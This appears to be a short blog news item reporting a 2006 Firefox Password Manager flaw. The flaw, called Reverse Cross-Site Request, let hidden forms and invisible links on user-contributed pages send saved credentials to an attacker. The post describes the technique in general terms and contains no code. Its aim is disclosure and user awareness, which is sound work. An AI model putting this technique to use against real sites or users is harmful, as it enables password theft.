How to exploit Mozilla Firefox

Are you one of those people who lets Firefox save your passwords so you don’t have to type them in again?
CHapin Information Services(CIS) has discovered a new flaw in Mozilla Firefox web browser that exposes saved passwords using a Reverse Cross-Site Request (RCSR) vulnerability.
The vulnerability exposes saved passwords and could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added.

“RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed,” says Chapin on his site.
“The Password Manager component of FireFox can be exploited to send a username and password combination to an attacker’s computer without the user’s knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.
“A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft 10/27/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password.”
A recent large-scale RCSR attack targeting MySpace.com involved fake login forms on the MySpace website inviting users to type in their username and password.

Chapin says worsening the problem is the fact forms can be completely hidden from view.
After saving a website password in Firefox, it’s possible for that password to be transmitted to another website by unwittingly clicking on an invisible image link, he says, adding:
“Mozilla confirmed this as bug number 360493, and said they are already working on a fix for version 2.0.0.1 or 2.0.0.2.”
A proof-of-concept demonstration is available here.

Chapin recently reported on a MySpace vulnerability which allowed music files to be downloaded anonymously and identified a gaping hole in Yahoo’s music sales site.

Dear visitor, thanks for dropping by. If you enjoyed reading this post, you may want to subscribe to my RSS feed. It could could win you some great prizes this month. Thanks for visiting!